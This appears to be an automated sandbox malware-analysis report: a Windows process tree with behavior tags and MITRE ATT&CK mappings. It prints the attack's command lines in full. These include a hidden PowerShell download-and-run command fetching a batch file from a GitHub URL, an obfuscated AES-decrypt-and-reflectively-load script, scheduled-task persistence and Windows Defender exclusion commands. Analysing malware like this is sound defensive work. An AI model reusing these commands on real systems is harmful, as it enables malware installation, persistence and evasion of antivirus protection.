1⤵
PID:2328

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3344

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2544
- - C:\Windows\system32\cmd.exe
    cmd /c start /min "" powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/DSADSADSA/Powershell.bat' -OutFile \"$env:temp\Powershell.bat\"; Start-Process \"$env:temp\Powershell.bat\""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/DSADSADSA/Powershell.bat' -OutFile \"$env:temp\Powershell.bat\"; Start-Process \"$env:temp\Powershell.bat\""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Powershell.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:1940
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_896_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs"
        7⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.bat" "
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        9⤵
        
        PID:3112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Stupido.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Stupido.exe"
        10⤵
        Executes dropped EXE
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\Payload.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
        10⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Enumerates connected drives
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Payload.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4784
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Payload.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Payload.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:512
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Payload" /tr "C:\Users\Admin\AppData\Roaming\Payload.exe"
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1600
        
        C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /F /IM explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:5032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"' & exit
        10⤵
        
        PID:3744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"'
        11⤵
        
        PID:3968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('–ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"'')); "
        12⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1344
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"' & exit
        10⤵
        
        PID:4768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"'
        11⤵
        
        PID:4340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('–ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"'')); "
        12⤵
        
        PID:1004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3916,i,7761714625659357865,10802238739796857379,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
1⤵
PID:1260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4920,i,7761714625659357865,10802238739796857379,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:8
1⤵
PID:3476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:4452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery